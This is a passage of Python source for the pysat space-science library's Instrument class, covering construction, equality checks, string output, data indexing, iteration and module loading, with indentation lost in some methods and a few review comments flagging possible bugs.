'ionprf',
altitude_bin=3)
cosmic.download(start, stop, user=user, password=password)
cosmic.load(date=start)
# Nano-kernel functionality enables instrument objects that are
# 'set and forget'. The functions are always run whenever
# the instrument load routine is called so instrument objects may
# be passed safely to other routines and the data will always
# be processed appropriately.
# Define custom function to modify Instrument in place.
def custom_func(inst, opt_param1=False, opt_param2=False):
# perform calculations and store in new_data
inst['new_data'] = new_data
return
inst = pysat.Instrument('pysat', 'testing')
inst.custom_attach(custom_func, kwargs={'opt_param1': True})
# Custom methods are applied to data when loaded.
inst.load(date=date)
print(inst['new_data2'])
# Custom methods may also be attached at instantiation.
# Create a dictionary for each custom method and associated inputs
custom_func_1 = {'function': custom_func,
'kwargs': {'opt_param1': True}}
custom_func_2 = {'function': custom_func, 'args'=[True, False]}
custom_func_3 = {'function': custom_func, 'at_pos'=0,
'kwargs': {'opt_param2': True}}
# Combine all dicts into a list in order of application and execution,
# although this can be modified by specifying 'at_pos'. The actual
# order these functions will run is: 3, 1, 2
custom = [custom_func_1, custom_func_2, custom_func_3]
# Instantiate pysat.Instrument
inst = pysat.Instrument(platform, name, inst_id=inst_id, tag=tag,
custom=custom)
"""
# -----------------------------------------------------------------------
# Define all magic methods
def __init__(self, platform=None, name=None, tag=None, inst_id=None,
clean_level=None, update_files=None, pad=None,
orbit_info=None, inst_module=None, directory_format=None,
file_format=None, temporary_file_list=False,
strict_time_flag=True, ignore_empty_files=False,
labels={'units': ('units', str), 'name': ('long_name', str),
'notes': ('notes', str), 'desc': ('desc', str),
'min_val': ('value_min', np.float64),
'max_val': ('value_max', np.float64),
'fill_val': ('fill', np.float64)},
custom=None, **kwargs):
# Set default tag and inst_id
self.tag = tag.lower() if tag is not None else ''
self.inst_id = inst_id.lower() if inst_id is not None else ''
self.inst_module = inst_module
if self.inst_module is None:
# Use strings to look up module name
if isinstance(platform, str) and isinstance(name, str):
self.platform = platform.lower()
self.name = name.lower()
# Look to module for instrument functions and defaults
self._assign_attrs(by_name=True, tag=self.tag,
inst_id=self.inst_id)
elif (platform is None) and (name is None):
# Creating "empty" Instrument object with this path
self.name = ''
self.platform = ''
self._assign_attrs(tag=self.tag, inst_id=self.inst_id)
else:
raise ValueError(' '.join(('Inputs platform and name must both',
'be strings, or both None.')))
else:
# User has provided a module, assign platform and name here
for iattr in ['platform', 'name']:
if hasattr(self.inst_module, iattr):
setattr(self, iattr,
getattr(self.inst_module, iattr).lower())
else:
raise AttributeError(
''.join(['Supplied module {:}'.format(self.inst_module),
' is missing required attribute: ', iattr]))
# Look to supplied module for instrument functions and non-default
# attribute values
self._assign_attrs(inst_module=self.inst_module,
tag=self.tag, inst_id=self.inst_id)
# More reasonable defaults for optional parameters
self.clean_level = (clean_level.lower() if clean_level is not None
else pysat.params['clean_level'])
# Assign strict_time_flag
self.strict_time_flag = strict_time_flag
# Assign directory format information, which tells pysat how to look in
# sub-directories for files.
if directory_format is not None:
# assign_func sets some instrument defaults, but user inputs
# take precedence
self.directory_format = directory_format
# The value provided by the user or the Instrument may be either
# a string or a function
if self.directory_format is not None:
if callable(self.directory_format):
self.directory_format = self.directory_format(tag, inst_id)
else:
# Value not provided by user or developer. Use stored value.
self.directory_format = pysat.params['directory_format']
# Assign the file format string, if provided by user. This enables
# users to temporarily put in a new string template for files that may
# not match the standard names obtained from the download routine.
if file_format is not None:
self.file_format = file_format
# Check to make sure value is reasonable
if self.file_format is not None:
# Check if it is an iterable string. If it isn't formatted
# properly, raise a ValueError
if(not isinstance(self.file_format, str)
or (self.file_format.find("{") < 0)
or (self.file_format.find("}") < 0)):
raise ValueError(''.join(['file format set to default, ',
'supplied string must be iterable ',
'[{:}]'.format(self.file_format)]))
# set up empty data and metadata
# check if pandas or xarray format
if self.pandas_format:
self._null_data = pds.DataFrame(None)
self._data_library = pds.DataFrame
else:
self._null_data = xr.Dataset(None)
self._data_library = xr.Dataset
# assign null data for user selected data type
self.data = self._null_data.copy()
# Create Meta instance with appropriate labels. Meta class methods will
# use Instrument definition of MetaLabels over the Metadata declaration
self.meta_labels = labels
self.meta = pysat.Meta(labels=self.meta_labels)
self.meta.mutable = False
# Nano-kernel processing variables. Feature processes data on each load.
self.custom_functions = []
self.custom_args = []
self.custom_kwargs = []
# Process provided user input for custom methods, if provided.
if custom is not None:
# Required keys.
req_key = 'function'
for cust in custom:
# Check if required keys present in input.
if req_key not in cust:
estr = ''.join(('Input dict to custom is missing the ',
'required key: ', req_key))
raise ValueError(estr)
# Set the custom kwargs
cust_kwargs = dict()
for ckey in cust.keys():
if ckey != req_key:
cust_kwargs[ckey] = cust[ckey]
# Inputs have been checked, add to Instrument object.
self.custom_attach(cust['function'], **cust_kwargs)
# Create arrays to store data around loaded day. This enables padding
# across day breaks with minimal loads
self._next_data = self._null_data.copy()
self._next_data_track = []
self._prev_data = self._null_data.copy()
self._prev_data_track = []
self._curr_data = self._null_data.copy()
# Initialize the padding
if isinstance(pad, (dt.timedelta, pds.DateOffset)) or pad is None:
self.pad = pad
elif isinstance(pad, dict):
self.pad = pds.DateOffset(**pad)
else:
raise ValueError(' '.join(['pad must be a dict, NoneType,',
'datetime.timedelta, or',
'pandas.DateOffset instance.']))
# Store kwargs, passed to standard routines first
self.kwargs = {}
self.kwargs_supported = {}
self.kwargs_reserved = _reserved_keywords.copy()
saved_keys = []
# Expected function keywords
exp_keys = ['list_files', 'load', 'preprocess', 'download',
'list_remote_files', 'clean', 'init']
for fkey in exp_keys:
func_name = _kwargs_keys_to_func_name(fkey)
func = getattr(self, func_name)
# Get dict of supported keywords and values
default_kwargs = _get_supported_keywords(func)
# Confirm there are no reserved keywords present
for kwarg in kwargs.keys():
if kwarg in self.kwargs_reserved:
estr = ''.join(('Reserved keyword "', kwarg, '" is not ',
'allowed at instantiation.'))
raise ValueError(estr)
# Check if kwargs are in list
good_kwargs = [ckey for ckey in kwargs.keys()
if ckey in default_kwargs]
# Store appropriate user supplied keywords for this function
self.kwargs[fkey] = {gkey: kwargs[gkey] for gkey in good_kwargs}
# Store all supported keywords for user edification
self.kwargs_supported[fkey] = default_kwargs
# Store keys to support check that all user supplied
# keys are used.
saved_keys.extend(default_kwargs.keys())
# Test for user supplied keys that are not used
missing_keys = []
for custom_key in kwargs:
if custom_key not in saved_keys and (custom_key not in exp_keys):
missing_keys.append(custom_key)
if len(missing_keys) > 0:
raise ValueError('unknown keyword{:s} supplied: {:}'.format(
'' if len(missing_keys) == 1 else 's', missing_keys))
# Instantiate the Files class
temporary_file_list = not temporary_file_list
if ignore_empty_files is None:
ignore_empty_files = pysat.params['ignore_empty_files']
if update_files is None:
update_files = pysat.params['update_files']
self.files = pysat.Files(self, directory_format=self.directory_format,
update_files=update_files,
file_format=self.file_format,
write_to_disk=temporary_file_list,
ignore_empty_files=ignore_empty_files)
# Set bounds for iteration. self.bounds requires the Files class, and
# setting bounds to (None, None) loads the default bounds.
self.bounds = (None, None)
self.date = None
self._fid = None
self.yr = None
self.doy = None
self._load_by_date = False
# Initialize orbit support
if orbit_info is None:
if self.orbit_info is None:
# If default info not provided, use class defaults
self.orbit_info = dict()
else:
self.orbit_info = orbit_info
self.orbits = pysat.Orbits(self, **self.orbit_info)
# Create empty placeholder for the meta translation table, which
# provides information about how to label metadata for netcdf export.
# If None, pysat metadata labels will be used instead.
self._meta_translation_table = None
# Create a placeholder for a post-processing function to be applied
# to the metadata dictionary before export. If None, no post-processing
# will occur
self._export_meta_post_processing = None
# Start with a daily increment for loading
self.load_step = dt.timedelta(days=1)
# Run instrument init function, a basic pass function is used if the
# user doesn't supply the init function
self._init_rtn(**self.kwargs['init'])
# Store base attributes, used in particular by Meta class
self._base_attr = dir(self)
    def __eq__(self, other):
        """Perform equality check between two Instrument objects.

        Parameters
        ----------
        other : any
            Other object to compare for equality

        Returns
        -------
        bool
            True if objects are identical, False if they are not.

        Note
        ----
        Data containers are compared by value; attached partial functions
        are compared by their string representation.

        """
        # Check if other is the same class (Instrument). Exit early if not.
        if not isinstance(other, self.__class__):
            return False
        # Check if both objects are the same data type. Exit early if not.
        if self.pandas_format != other.pandas_format:
            return False
        # Both the same data type, do both have data?
        if self.empty and other.empty:
            # This check needed to establish next check
            pass
        elif self.empty or other.empty:
            # Only one has data, exit early.
            return False
        # If data is the same, check other attributes. Partial functions
        # required their own path for equality, string comparisons!
        partial_funcs = ['_init_rtn', '_clean_rtn', '_preprocess_rtn',
                         '_list_files_rtn', '_download_rtn',
                         '_list_remote_files_rtn', '_load_rtn']
        # If the type is the same then check everything that is attached to
        # the Instrument object. Includes attributes, methods, variables, etc.
        checks = []
        # NOTE(review): `key_check` is accumulated below but never read in
        # this method — looks like a leftover; confirm before removing.
        key_check = []
        for key in self.__dict__.keys():
            if key not in ['data', '_null_data', '_next_data',
                           '_curr_data', '_prev_data']:
                key_check.append(key)
                if key in other.__dict__.keys():
                    if key in partial_funcs:
                        # Partial function comparison doesn't work directly;
                        # compare string representations instead.
                        try:
                            checks.append(str(self.__dict__[key])
                                          == str(other.__dict__[key]))
                        except AttributeError:
                            # If an item missing a required attribute
                            return False
                    else:
                        # General check for everything else.
                        checks.append(np.all(self.__dict__[key]
                                             == other.__dict__[key]))
                else:
                    # Both objects don't have the same attached objects
                    return False
            else:
                # Data comparison area. Established earlier both have data.
                if self.pandas_format:
                    try:
                        # Check is sensitive to the index labels. Errors
                        # if index is not identical.
                        checks.append(np.all(self.__dict__[key]
                                             == other.__dict__[key]))
                    except ValueError:
                        return False
                else:
                    checks.append(xr.Dataset.equals(self.data,
                                                    other.data))
        # Confirm that other Instrument object doesn't have extra terms
        for key in other.__dict__.keys():
            if key not in self.__dict__.keys():
                return False
        # Confirm all checks are True
        test_data = np.all(checks)
        return test_data
def __repr__(self):
""" Print the basic Instrument properties"""
# Create string for custom attached methods
cstr = '['
for func, arg, kwarg in zip(self.custom_functions, self.custom_args,
self.custom_kwargs):
tstr = "".join(("'function': {sfunc}, 'args': {sargs}, ",
"'kwargs': {kargs}"))
tstr = tstr.format(sfunc=repr(func), sargs=repr(arg),
kargs=repr(kwarg))
cstr = "".join((cstr, '{', tstr, '}, '))
cstr += ']'
# Deconstruct the kwargs
in_kwargs = dict()
for sort_key in self.kwargs.keys():
for meth_key in self.kwargs[sort_key]:
in_kwargs[meth_key] = self.kwargs[sort_key][meth_key]
# Get the inst_module string
if self.inst_module is None:
istr = "None"
else:
istr = getattr(self.inst_module, "__name__")
# Create string for other parts Instrument instantiation
out_str = "".join(["pysat.Instrument(platform='", self.platform,
"', name='", self.name, "', tag='", self.tag,
"', inst_id='", self.inst_id,
"', clean_level='", self.clean_level,
"', pad={:}, orbit_info=".format(self.pad),
"{:}, ".format(self.orbit_info),
"inst_module=", istr, ", custom=", cstr,
", **{:}".format(in_kwargs), ")"])
return out_str
def __str__(self):
""" Descriptively print the basic Instrument properties"""
# Get the basic Instrument properties
output_str = 'pysat Instrument object\n'
output_str += '-----------------------\n'
output_str += "Platform: '{:s}'\n".format(self.platform)
output_str += "Name: '{:s}'\n".format(self.name)
output_str += "Tag: '{:s}'\n".format(self.tag)
output_str += "Instrument id: '{:s}'\n".format(self.inst_id)
# Print out the data processing information
output_str += '\nData Processing\n'
output_str += '---------------\n'
output_str += "Cleaning Level: '{:s}'\n".format(self.clean_level)
output_str += 'Data Padding: {:s}\n'.format(self.pad.__str__())
for routine in self.kwargs.keys():
output_str += 'Keyword Arguments Passed to {:s}: '.format(routine)
output_str += "{:s}\n".format(self.kwargs[routine].__str__())
num_funcs = len(self.custom_functions)
output_str += "Custom Functions: {:d} applied\n".format(num_funcs)
if num_funcs > 0:
for i, func in enumerate(self.custom_functions):
output_str += " {:d}: {:}\n".format(i, func.__repr__())
if len(self.custom_args[i]) > 0:
ostr = " : Args={:}\n".format(self.custom_args[i])
output_str += ostr
if len(self.custom_kwargs[i]) > 0:
ostr = " : Kwargs={:}\n".format(self.custom_kwargs[i])
output_str += ostr
output_str += '\n'
# Print out the orbit settings
if self.orbits.orbit_index is not None:
output_str += '{:s}\n'.format(self.orbits.__str__())
# Print the local file information
output_str += self.files.__str__()
# Display loaded data
output_str += '\n\nLoaded Data Statistics\n'
output_str += '----------------------\n'
if not self.empty:
output_str += 'Date: ' + self.date.strftime('%d %B %Y') + '\n'
output_str += 'DOY: {:03d}\n'.format(self.doy)
output_str += 'Time range: '
output_str += self.index[0].strftime('%d %B %Y %H:%M:%S')
output_str += ' --- '
output_str += self.index[-1].strftime('%d %B %Y %H:%M:%S\n')
output_str += 'Number of Times: {:d}\n'.format(len(self.index))
output_str += 'Number of variables: {:d}\n'.format(
len(self.variables))
output_str += '\nVariable Names:\n'
output_str += utils._core.fmt_output_in_cols(self.variables)
# Print the short version of the metadata
output_str += '\n{:s}'.format(self.meta.__str__(long_str=False))
else:
output_str += 'No loaded data.\n'
return output_str
def __getitem__(self, key):
"""
Convenience notation for accessing data; inst['name'] is inst.data.name
Parameters
----------
key : str, tuple, or dict
Data variable name, tuple with a slice, or dict used to locate
desired data
Note
----
See pandas or xarray .loc and .iloc documentation for more details
Examples
--------
::
# By name
inst['name']
# By list of names
inst[['name1', 'name2']]
# By position
inst[row_index, 'name']
# Slicing by row
inst[row1:row2, 'name']
# By Date
inst[datetime, 'name']
# Slicing by date, inclusive
inst[datetime1:datetime2, 'name']
# Slicing by name and row/date
inst[datetime1:datetime2, 'name1':'name2']
"""
if self.pandas_format:
if isinstance(key, str):
return self.data[key]
elif isinstance(key, tuple):
try:
# Pass keys directly through
return self.data.loc[key[0], key[1]]
except (KeyError, TypeError) as err1:
# TypeError for single integer
# KeyError for list, array, slice of integers
# Assume key[0] is integer (including list or slice)
try:
return self.data.loc[self.data.index[key[0]], key[1]]
except IndexError as err2:
err_message = '\n'.join(("original messages:",
str(err1), str(err2)))
raise ValueError(' '.join(("Check requested indexes,",
"data may not exist.",
err_message)))
else:
try:
# integer based indexing
return self.data.iloc[key]
except (TypeError, ValueError):
# If it's not an integer, TypeError is thrown
# If it's a list, ValueError is thrown
return self.data[key]
else:
return self.__getitem_xarray__(key)
    def __getitem_xarray__(self, key):
        """Access xarray data; ``inst['name']`` is ``inst.data.name``.

        Parameters
        ----------
        key : str, tuple, or dict
            Data variable name, tuple with a slice, or dict used to locate
            desired data

        Returns
        -------
        xr.Dataset
            Dataset of with only the desired values

        Note
        ----
        See xarray .loc and .iloc documentation for more details

        Examples
        --------
        ::

            # By name
            inst['name']
            # By position
            inst[row_index, 'name']
            # Slicing by row
            inst[row1:row2, 'name']
            # By Date
            inst[datetime, 'name']
            # Slicing by date, inclusive
            inst[datetime1:datetime2, 'name']
            # Slicing by name and row/date
            inst[datetime1:datetime2, 'name1':'name2']

        """
        # Identify the time index; supported names are 'Epoch' and 'time'.
        if 'Epoch' in self.data.indexes:
            epoch_name = 'Epoch'
        elif 'time' in self.data.indexes:
            epoch_name = 'time'
        else:
            # No recognized time index: nothing to select from
            return xr.Dataset(None)
        if isinstance(key, tuple):
            if len(key) == 2:
                # Support slicing time, variable name
                try:
                    # Integer-position selection along the time dimension
                    return self.data.isel(indexers={epoch_name: key[0]})[key[1]]
                except (TypeError, KeyError):
                    try:
                        # Label-based selection along the time dimension
                        return self.data.sel(indexers={epoch_name:
                                                       key[0]})[key[1]]
                    except TypeError:
                        # Construct dataset from names
                        return self.data[self.variables[key[1]]]
                except ValueError as verr:
                    # This may be multidimensional indexing, where the multiple
                    # dimensions are contained within an iterable object
                    var_name = key[-1]
                    # If this is not true, raise the original error
                    if len(key[0]) != len(self[var_name].dims):
                        raise ValueError(verr)
                    # Construct a dictionary with dimensions as keys and the
                    # indexes to select for each dimension as values
                    indict = dict()
                    for i, dim in enumerate(self[var_name].dims):
                        indict[dim] = key[0][i]
                    return self.data[var_name][indict]
            else:
                # Multidimensional indexing where the multiple dimensions are
                # not contained within another object
                var_name = key[-1]
                # Ensure the dimensions are appropriate
                if len(key) - 1 != len(self[var_name].dims):
                    raise ValueError("indices don't match data dimensions")
                # Construct a dictionary with dimensions as keys and the
                # indexes to select for each dimension as values
                indict = dict()
                for i, dim in enumerate(self[var_name].dims):
                    indict[dim] = key[i]
                return self.data[var_name][indict]
        else:
            try:
                # Grab a particular variable by name
                return self.data[key]
            except (TypeError, KeyError):
                # If that didn't work, likely need to use `isel` or `sel`
                try:
                    # Try to get all data variables, but for a subset of time
                    # using integer indexing
                    return self.data.isel(indexers={epoch_name: key})
                except (TypeError, KeyError):
                    # Try to get a subset of time, using label based indexing
                    return self.data.sel(indexers={epoch_name: key})
    def __setitem__(self, key, new):
        """Convenience method for adding data to instrument.

        Parameters
        ----------
        key : str, tuple, dict
            String label, or dict or tuple of indices for new data
        new : dict, pandas.DataFrame, or xarray.Dataset
            New data as a dict (assigned with key 'data'), DataFrame, or
            Dataset

        Examples
        --------
        ::

            # Simple Assignment, default metadata assigned
            # 'long_name' = 'name'
            # 'units' = ''
            inst['name'] = newData
            # Assignment with Metadata
            inst['name'] = {'data':new_data,
                            'long_name':long_name,
                            'units':units}

        Note
        ----
        If no metadata provided and if metadata for 'name' not already stored
        then default meta information is also added,
        long_name = 'name', and units = ''.

        """
        # add data to main pandas.DataFrame, depending upon the input
        # aka slice, and a name
        if self.pandas_format:
            if isinstance(key, tuple):
                try:
                    # Pass directly through to loc
                    # This line raises a FutureWarning if key[0] is a slice
                    # The future behavior is TypeError, which is already
                    # handled correctly below
                    self.data.loc[key[0], key[1]] = new
                except (KeyError, TypeError):
                    # TypeError for single integer, slice (pandas 2.0)
                    # KeyError for list, array
                    # Assume key[0] is integer (including list or slice)
                    self.data.loc[self.data.index[key[0]], key[1]] = new
                # Refresh default metadata for the assigned variable
                self.meta[key[1]] = {}
                return
            elif not isinstance(new, dict):
                # make it a dict to simplify downstream processing
                new = {'data': new}
            # input dict must have data in 'data',
            # the rest of the keys are presumed to be metadata
            in_data = new.pop('data')
            if hasattr(in_data, '__iter__'):
                if isinstance(in_data, pds.DataFrame):
                    pass
                # filter for elif
                elif isinstance(next(iter(in_data), None), pds.DataFrame):
                    # Input is a list_like of frames, denoting higher order data
                    if ('meta' not in new) and (key not in self.meta.keys_nD()):
                        # Create an empty Meta instance but with variable names.
                        # This will ensure the correct defaults for all
                        # subvariables. Meta can filter out empty metadata as
                        # needed, the check above reduces the need to create
                        # Meta instances
                        ho_meta = pysat.Meta(labels=self.meta_labels)
                        ho_meta[in_data[0].columns] = {}
                        self.meta[key] = ho_meta
            # assign data and any extra metadata
            self.data[key] = in_data
            self.meta[key] = new
        else:
            # xarray format chosen for Instrument object
            if not isinstance(new, dict):
                new = {'data': new}
            in_data = new.pop('data')
            # Identify the time index; supported names are 'Epoch' and 'time'
            if 'Epoch' in self.data.indexes:
                epoch_name = 'Epoch'
            elif 'time' in self.data.indexes:
                epoch_name = 'time'
            else:
                raise ValueError(' '.join(('Unsupported time index name,',
                                           '"Epoch" or "time".')))
            if isinstance(key, tuple):
                # user provided more than one thing in assignment location
                # something like, index integers and a variable name
                # self[idx, 'variable'] = stuff
                # or, self[idx1, idx2, idx3, 'variable'] = stuff
                # construct dictionary of dimensions and locations for
                # xarray standards
                indict = {}
                for i, dim in enumerate(self[key[-1]].dims):
                    indict[dim] = key[i]
                try:
                    # Try loading as values
                    self.data[key[-1]].loc[indict] = in_data
                except (TypeError, KeyError):
                    # Try loading indexed as integers
                    self.data[key[-1]][indict] = in_data
                self.meta[key[-1]] = new
                return
            elif isinstance(key, str):
                # Assigning basic variables
                if isinstance(in_data, xr.DataArray):
                    # If xarray input, take as is
                    self.data[key] = in_data
                elif len(np.shape(in_data)) == 1:
                    # If not an xarray input, but still iterable, then we
                    # go through to process the 1D input
                    if len(in_data) == len(self.index):
                        # 1D input has the correct length for storage along
                        # 'Epoch'
                        self.data[key] = (epoch_name, in_data)
                    elif len(in_data) == 1:
                        # only provided a single number in iterable, make that
                        # the input for all times
                        self.data[key] = (epoch_name,
                                          [in_data[0]] * len(self.index))
                    elif len(in_data) == 0:
                        # Provided an empty iterable, make everything NaN
                        self.data[key] = (epoch_name,
                                          [np.nan] * len(self.index))
                    # NOTE(review): a 1D input whose length is neither 0, 1,
                    # nor len(self.index) is silently ignored here — confirm
                    # whether an error should be raised instead.
                elif len(np.shape(in_data)) == 0:
                    # Not an iterable input, rather a single number. Make
                    # that number the input for all times
                    self.data[key] = (epoch_name, [in_data] * len(self.index))
                else:
                    # Multidimensional input that is not an xarray. The user
                    # needs to provide everything that is required for success
                    if isinstance(in_data, tuple):
                        self.data[key] = in_data
                    else:
                        raise ValueError(' '.join(('Must provide dimensions',
                                                   'for xarray multidim',
                                                   'data using input tuple.')))
            elif hasattr(key, '__iter__'):
                # Multiple input strings (keys) are provided, but not in tuple
                # form. Recurse back into this function, setting each input
                # individually
                for keyname in key:
                    self.data[keyname] = in_data[keyname]
        # Attach metadata
        self.meta[key] = new
        return
    def __iter__(self):
        """Iterates instrument object by loading subsequent days or files.

        Note
        ----
        Limits of iteration, and iteration type (date/file)
        set by `bounds` attribute.
        Default bounds are the first and last dates from files on local system.

        Examples
        --------
        ::

            inst = pysat.Instrument(platform=platform, name=name, tag=tag)
            start = dt.datetime(2009, 1, 1)
            stop = dt.datetime(2009, 1, 31)
            inst.bounds = (start, stop)
            for inst in inst:
                print('Another day loaded', inst.date)

        """
        if self._iter_type == 'file':
            width = self._iter_width
            for fname in self._iter_list:
                # Without a copy, a = [inst for inst in inst] leads to
                # every item being the last day loaded.
                # With the copy, behavior is as expected. Making a copy
                # of an empty object is going to be faster than a full one.
                self.data = self._null_data
                local_inst = self.copy()
                # load range of files
                # get location for second file, width of 1 loads only one file
                nfid = self.files.get_index(fname) + width - 1
                local_inst.load(fname=fname, stop_fname=self.files[nfid])
                yield local_inst
        elif self._iter_type == 'date':
            # Iterate over dates. A list of dates is generated whenever
            # bounds are set
            for date in self._iter_list:
                # Use a copy trick, starting with null data in object
                self.data = self._null_data
                local_inst = self.copy()
                # Set the user-specified range of dates
                end_date = date + self._iter_width
                # Load the range of dates
                local_inst.load(date=date, end_date=end_date)
                yield local_inst
        # Add last loaded data/metadata from local_inst into the original object
        # Making copy here to ensure there are no left over references
        # to the local_inst object in the loop that would interfere with
        # garbage collection. Don't want to make a copy of underlying data.
        # NOTE(review): if `_iter_list` is empty, or `_iter_type` matches
        # neither branch, `local_inst` is unbound here and a NameError is
        # raised — confirm bounds always yield at least one item.
        local_inst_data = local_inst.data
        local_inst.data = local_inst._null_data
        self.data = local_inst_data
        self.meta = local_inst.meta.copy()
# -----------------------------------------------------------------------
# Define all hidden methods
def _empty(self, data=None):
"""Boolean flag reflecting lack of data
Parameters
----------
data : NoneType, pds.DataFrame, or xr.Dataset
Data object
Returns
-------
bool
True if there is no Instrument data, False if there is data
"""
if data is None:
data = self.data
if self.pandas_format:
return data.empty
else:
if 'time' in data.indexes:
return len(data.indexes['time']) == 0
elif 'Epoch' in data.indexes:
return len(data.indexes['Epoch']) == 0
else:
return True
def _index(self, data=None):
"""Returns time index of loaded data
Parameters
----------
data : NoneType, pds.DataFrame, or xr.Dataset
Data object
Returns
-------
pds.Series
Series containing the time indeces for the Instrument data
"""
if data is None:
data = self.data
if self.pandas_format:
return data.index
else:
if 'time' in data.indexes:
return data.indexes['time']
elif 'Epoch' in data.indexes:
return data.indexes['Epoch']
else:
return pds.Index([])
def _pass_method(*args, **kwargs):
""" Default method for updatable Instrument methods
"""
pass
    def _assign_attrs(self, by_name=False, inst_module=None, tag=None,
                      inst_id=None):
        """Assign all external instrument attributes to the Instrument object.

        Parameters
        ----------
        by_name : boolean
            If True, uses self.platform and self.name to load the Instrument,
            if False uses inst_module. (default=False)
        inst_module : module or NoneType
            Instrument module or None, if not specified (default=None)
        tag : str or NoneType
            Instrument tag string
        inst_id : str or NoneType
            Instrument inst_id string

        Raises
        ------
        KeyError
            If unknown platform or name supplied
        ImportError
            If there was an error importing the instrument module
        AttributeError
            If a required Instrument method is missing
        ValueError
            If the supplied tag or inst_id is not supported by the module

        Note
        ----
        methods
            init, preprocess, and clean
        functions
            load, list_files, download, and list_remote_files
        attributes
            directory_format, file_format, multi_file_day, orbit_info, and
            pandas_format
        test attributes
            _download_test, _download_test_travis, and _password_req

        """
        # Declare the standard Instrument methods and attributes
        inst_methods = {'required': ['init', 'clean'],
                        'optional': ['preprocess']}
        inst_funcs = {'required': ['load', 'list_files', 'download'],
                      'optional': ['list_remote_files']}
        inst_attrs = {'directory_format': None, 'file_format': None,
                      'multi_file_day': False, 'orbit_info': None,
                      'pandas_format': True}
        test_attrs = {'_test_download': True, '_test_download_travis': True,
                      '_password_req': False}
        # Set method defaults (no-op pass method)
        for mname in [mm for val in inst_methods.values() for mm in val]:
            local_name = _kwargs_keys_to_func_name(mname)
            setattr(self, local_name, self._pass_method)
        # Set function defaults (module-level pass function)
        for mname in [mm for val in inst_funcs.values() for mm in val]:
            local_name = _kwargs_keys_to_func_name(mname)
            setattr(self, local_name, _pass_func)
        # Set attribute defaults
        for iattr in inst_attrs.keys():
            setattr(self, iattr, inst_attrs[iattr])
        # Set test defaults
        for iattr in test_attrs.keys():
            setattr(self, iattr, test_attrs[iattr])
        # Get the instrument module information, returning with defaults
        # if none is supplied
        if by_name:
            # pysat platform is reserved for modules within pysat.instruments
            if self.platform == 'pysat':
                # Look within pysat
                inst = importlib.import_module(
                    ''.join(('.', self.platform, '_', self.name)),
                    package='pysat.instruments')
            else:
                # Not a native pysat.Instrument. First, get the supporting
                # instrument module from the pysat registry.
                user_modules = pysat.params['user_modules']
                if self.platform not in user_modules.keys():
                    raise KeyError('unknown platform supplied: {:}'.format(
                        self.platform))
                if self.name not in user_modules[self.platform].keys():
                    raise KeyError(''.join(['unknown name supplied: ',
                                            self.name, ' not assigned to the ',
                                            self.platform, ' platform']))
                mod = user_modules[self.platform][self.name]
                # Import the registered module. Though modules are checked to
                # ensure they may be imported when registered, something may
                # have changed on the system since it was originally checked.
                try:
                    inst = importlib.import_module(mod)
                except ImportError as ierr:
                    estr = ' '.join(('unable to locate or import module for',
                                     'platform {:}, name {:}'))
                    estr = estr.format(self.platform, self.name)
                    logger.error(estr)
                    raise ImportError(ierr)
        elif inst_module is not None:
            # User supplied an object with relevant instrument routines
            inst = inst_module
        else:
            # No module or name info, default pass functions assigned
            return
        # Check if tag and inst_id are appropriate for the module
        if inst_id not in inst.inst_ids.keys():
            inst_id_str = ', '.join([ikey.__repr__()
                                     for ikey in inst.inst_ids.keys()])
            estr = ''.join(("'", inst_id, "' is not one of the supported ",
                            'inst_ids. Supported inst_ids are: ',
                            inst_id_str, '.'))
            raise ValueError(estr)
        if tag not in inst.inst_ids[inst_id]:
            tag_str = ', '.join([tkey.__repr__()
                                 for tkey in inst.inst_ids[inst_id]])
            estr = ''.join(("'", tag, "' is not one of the supported tags. ",
                            'Supported tags are: ', tag_str, '.'))
            raise ValueError(estr)
        # Assign the Instrument methods
        missing = list()
        for mstat in inst_methods.keys():
            for mname in inst_methods[mstat]:
                if hasattr(inst, mname):
                    local_name = _kwargs_keys_to_func_name(mname)
                    # Remote functions are not attached as methods unless
                    # cast that way, specifically
                    # https://stackoverflow.com/questions/972/
                    # adding-a-method-to-an-existing-object-instance
                    local_method = types.MethodType(getattr(inst, mname), self)
                    setattr(self, local_name, local_method)
                else:
                    missing.append(mname)
                    if mstat == "required":
                        raise AttributeError(
                            "".join(['A `', mname, '` method is required',
                                     ' for every Instrument']))
        if len(missing) > 0:
            logger.debug('Missing Instrument methods: {:}'.format(missing))
        # Assign the Instrument functions
        missing = list()
        for mstat in inst_funcs.keys():
            for mname in inst_funcs[mstat]:
                if hasattr(inst, mname):
                    local_name = _kwargs_keys_to_func_name(mname)
                    setattr(self, local_name, getattr(inst, mname))
                else:
                    missing.append(mname)
                    if mstat == "required":
                        raise AttributeError(
                            "".join(['A `', mname, '` function is required',
                                     ' for every Instrument']))
        if len(missing) > 0:
            logger.debug('Missing Instrument methods: {:}'.format(missing))
        # Look for instrument default parameters
        missing = list()
        for iattr in inst_attrs.keys():
            if hasattr(inst, iattr):
                setattr(self, iattr, getattr(inst, iattr))
            else:
                missing.append(iattr)
        if len(missing) > 0:
            logger.debug(''.join(['These Instrument attributes kept their ',
                                  'default values: {:}'.format(missing)]))
        # Check for download flags for tests
        missing = list()
        for iattr in test_attrs.keys():
            # Check and see if this instrument has the desired test flag
            if hasattr(inst, iattr):
                local_attr = getattr(inst, iattr)
                # Test to see that this attribute is set for the desired
                # inst_id and tag
                if self.inst_id in local_attr.keys():
                    if self.tag in local_attr[self.inst_id].keys():
                        # Update the test attribute value
                        setattr(self, iattr, local_attr[self.inst_id][self.tag])
                    else:
                        missing.append(iattr)
                else:
                    missing.append(iattr)
            else:
                missing.append(iattr)
        if len(missing) > 0:
            logger.debug(''.join(['These Instrument test attributes kept their',
                                  ' default values: {:}'.format(missing)]))
        return
def _load_data(self, date=None, fid=None, inc=None, load_kwargs=None):
"""
Load data for an instrument on given date or fid, depending upon input.
Parameters
----------
date : dt.datetime or NoneType
file date (default=None)
fid : int or NoneType
filename index value (default=None)
inc : dt.timedelta or int
Increment of files or dates to load, starting from the
root date or fid (default=None)
load_kwargs : dict
Dictionary of keywords that may be options for specific instruments.
If None, uses `self.kwargs['load']`. (default=None)
Returns
-------
data : pds.DataFrame or xr.Dataset
pysat data
meta : pysat.Meta
pysat meta data
"""
# Set default load_kwargs
if load_kwargs is None:
load_kwargs = self.kwargs['load']
date = utils.time.filter_datetime_input(date)
if fid is not None:
# get filename based off of index value
# inclusive loading on filenames
fname = self.files[fid:(fid + inc + 1)]
elif date is not None:
fname = self.files[date:(date + inc)]
else:
raise ValueError('Must supply either a date or file id number.')
if len(fname) > 0:
load_fname = [os.path.join(self.files.data_path, f) for f in fname]
try:
